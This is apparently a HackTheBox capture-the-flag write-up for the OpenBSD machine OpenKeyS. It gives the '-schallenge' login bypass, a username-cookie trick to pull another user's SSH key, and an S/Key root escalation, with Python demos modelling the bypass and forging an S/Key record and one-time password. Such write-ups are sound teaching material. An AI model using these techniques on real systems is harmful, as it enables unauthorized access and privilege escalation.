OpenKeyS — HackTheBox

y4th0ts
4 min read · Dec 12, 2020

Summary

OpenKeyS is a medium-rated OpenBSD machine created by polarbearer & GibParadox. The initial foothold comes from an authentication bypass in the login form of the HTTP service. User access is gained by adding a username cookie for a discovered user, ‘jennifer’, and repeating the bypass to retrieve her SSH private key. Root is obtained through a local privilege escalation via S/Key authentication, which works because the user belongs to the ‘auth’ group.

Reconnaissance

An Nmap scan shows only port 22 (SSH) and port 80 (HTTP) open.

Visiting the HTTP service displays a login page. Common credentials do not authenticate, and there is no robots.txt.

I did a directory brute force and managed to find a few directories to look at.

The includes directory shows a couple of files.

auth.php.swp is a Vim swap file left behind by someone editing auth.php, so it holds fragments of the PHP source that the web server would otherwise never expose. Reading it gives me some information, such as a possible user ‘jennifer’ and the path of another file, ‘/auth_helpers/check_auth’.

I went and checked the ‘/auth_helpers/check_auth’ which prompts me to download a file.

The file is a binary executable, but I didn’t bother looking into it yet; I saved it for later in case I could not find anything else.

Authentication Bypass

After doing some research on OpenBSD authentication, I found a few articles that explain an authentication bypass and a local privilege escalation (the Qualys advisory from December 2019: CVE-2019-19521 for the bypass and CVE-2019-19522 for the escalation through the ‘auth’ group).

By supplying -schallenge as the username and passwd as the password, I was able to log in. This works because the web application hands the username to OpenBSD’s BSD Auth framework, which passes it on to the login_passwd helper as a command-line argument; a username beginning with ‘-’ is parsed as an option, and -schallenge is read as ‘-s challenge’, an authentication style in which the helper reports success without ever checking a password. The only problem is that after logging in, I don’t find anything useful. All I know at this point is that the service seems to store OpenSSH keys for users.
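To make the mechanism concrete, here is an added example (my own simplified model, not code from the box, from OpenBSD, or from the Qualys advisory) of how a username that looks like an option changes the behaviour of an authentication helper whose argv is built from user input. The user database, the ‘default’ login class and the return strings are constructed for the demo; the hardened version applies the same idea as the OpenBSD fix as I understand it (refuse names beginning with ‘-’) plus a ‘--’ terminator so positional arguments can never be parsed as options.

```python
import getopt

# Constructed stand-ins for the BSD Auth back-channel replies that the
# login_passwd helper sends to libc.
BI_AUTH = "authorize"
BI_SILENT = "authorize silent"   # authorized, print nothing
BI_REJECT = "reject"

# Constructed user database standing in for /etc/master.passwd.
USERS = {"jennifer": "correct horse battery staple"}


def login_passwd(argv, password, users=USERS):
    """Simplified model of OpenBSD's login_passwd(8) helper.

    The helper parses argv with getopt("ds:v:") and takes the first
    non-option argument as the user name.  In 'challenge' mode it answers
    BI_SILENT without reading a password at all, which is exactly what a
    '-schallenge' user name switches on.
    """
    mode = "login"
    try:
        opts, args = getopt.getopt(argv, "ds:v:")
    except getopt.GetoptError:
        return BI_REJECT
    for opt, val in opts:
        if opt == "-s":
            mode = val                # a later -s overrides an earlier one
    if mode == "challenge":
        return BI_SILENT              # the bug: success with no check
    if not args:
        return BI_REJECT
    user = args[0]
    if users.get(user) == password:
        return BI_AUTH
    return BI_REJECT


def authenticate_vulnerable(username, password):
    """Model of libc authenticate() before the fix: the raw user name is
    appended to the helper's argv after the '-s response' pair, so a name
    starting with '-' is consumed as a further option."""
    argv = ["-s", "response", username, "default"]
    return login_passwd(argv, password) in (BI_AUTH, BI_SILENT)


def authenticate_fixed(username, password):
    """Hardened caller: refuse option-looking names and end option
    parsing with '--' before any positional argument."""
    if not username or username.startswith("-"):
        return False
    argv = ["-s", "response", "--", username, "default"]
    return login_passwd(argv, password) in (BI_AUTH, BI_SILENT)


if __name__ == "__main__":
    print("vulnerable, -schallenge / passwd :", authenticate_vulnerable("-schallenge", "passwd"))
    print("vulnerable, jennifer / wrong     :", authenticate_vulnerable("jennifer", "wrong"))
    print("fixed,      -schallenge / passwd :", authenticate_fixed("-schallenge", "passwd"))
    print("fixed,      jennifer / correct   :", authenticate_fixed("jennifer", USERS["jennifer"]))
```

The general lesson is the same whenever a program forwards user-controlled strings as argv to another program: either validate that the value cannot begin with ‘-’, or make sure the callee stops option parsing (‘--’) before it sees the value.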

Since I have a possible user, I tried adding a cookie with the username ‘jennifer’; after performing the authentication bypass again, I found jennifer’s SSH private key.

I downloaded the key, used it to login to SSH and grabbed the user flag.

Privilege Escalation

Since the article I previously found already showcases a local privilege escalation, I looked for publicly posted exploits and found a bash script on GitHub to escalate privileges. The script checks whether the OpenBSD system supports YubiKey or S/Key authentication and exploits whichever is available, as long as the current user belongs to the ‘auth’ group. That group matters because the directories holding the S/Key and YubiKey secrets (/etc/skey and /var/db/yubikey) are writable by it, so a member can plant a record for root.

The exploit deletes the current /etc/skey/root file and replaces it with one whose seed and passphrase it chose, then invokes su with S/Key authentication. After executing it, an S/Key password prompt appears; entering the one-time password the script provides gives me a root shell, and I finish by grabbing the root flag.

That is it for OpenKeyS, thanks for reading and stay safe all!
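To show why the password the script provides is accepted, here is an added example (my own code, not the GitHub script used above and not OpenBSD’s libskey) that models the S/Key chain the escalation abuses: whoever can write /etc/skey/root picks the passphrase behind the stored hash, so they can also compute the next one-time password that the system will verify against it. The record layout ‘user hash seq seed hex’, the seed ‘obsd12345’, the passphrase and the user name are constructed for the demo, and the hashing follows the MD5 variant of RFC 2289 as I understand it; check the output against RFC 2289 Appendix C or a real skey(1) before relying on compatibility.

```python
import hashlib
import hmac


def _fold_md5(data: bytes) -> bytes:
    """One S/Key MD5 step: MD5 the input and fold the 16-byte digest to
    8 bytes by XORing its two halves."""
    d = hashlib.md5(data).digest()
    return bytes(a ^ b for a, b in zip(d[:8], d[8:]))


def skey_otp(passphrase: str, seed: str, n: int) -> bytes:
    """One-time password number n: hash(seed + passphrase), then n more
    hashes.  The seed is case-insensitive, so it is lowercased first."""
    h = _fold_md5((seed.lower() + passphrase).encode())
    for _ in range(n):
        h = _fold_md5(h)
    return h


def forge_skey_record(user: str, passphrase: str, seed: str, n: int = 100) -> str:
    """Record a member of the 'auth' group could drop into /etc/skey/<user>.
    The 'user hash seq seed hex' layout is an assumption for this demo."""
    return f"{user} md5 {n:04d} {seed} {skey_otp(passphrase, seed, n).hex()}"


def skey_response(passphrase: str, record: str) -> str:
    """What to type at the S/Key prompt for a record: OTP number seq - 1,
    in the hexadecimal form that RFC 2289 verifiers accept alongside the
    six-word form."""
    _, _, seq, seed, _ = record.split()
    return skey_otp(passphrase, seed, int(seq) - 1).hex()


def skey_verify(record: str, response_hex: str) -> bool:
    """Verifier side: hash the response once more and compare it with the
    stored value.  A real verifier would then store the response as the
    new value with seq - 1 so it cannot be replayed."""
    fields = record.split()
    if len(fields) != 5 or fields[1] != "md5":
        return False
    stored = fields[4]
    try:
        resp = bytes.fromhex(response_hex)
    except ValueError:
        return False
    if len(resp) != 8:
        return False
    return hmac.compare_digest(_fold_md5(resp).hex(), stored)


if __name__ == "__main__":
    # Constructed values: nothing here comes from the OpenKeyS box.
    record = forge_skey_record("root", "not the real passphrase", "obsd12345", 100)
    otp = skey_response("not the real passphrase", record)
    print("planted record :", record)
    print("prompt         : otp-md5 99 obsd12345")
    print("response       :", otp)
    print("accepted       :", skey_verify(record, otp))
```

The point of the demo is that S/Key’s security rests entirely on the secrecy of the passphrase behind the stored hash and the integrity of the record; once a low-privileged group can rewrite the record, the one-way chain protects nothing.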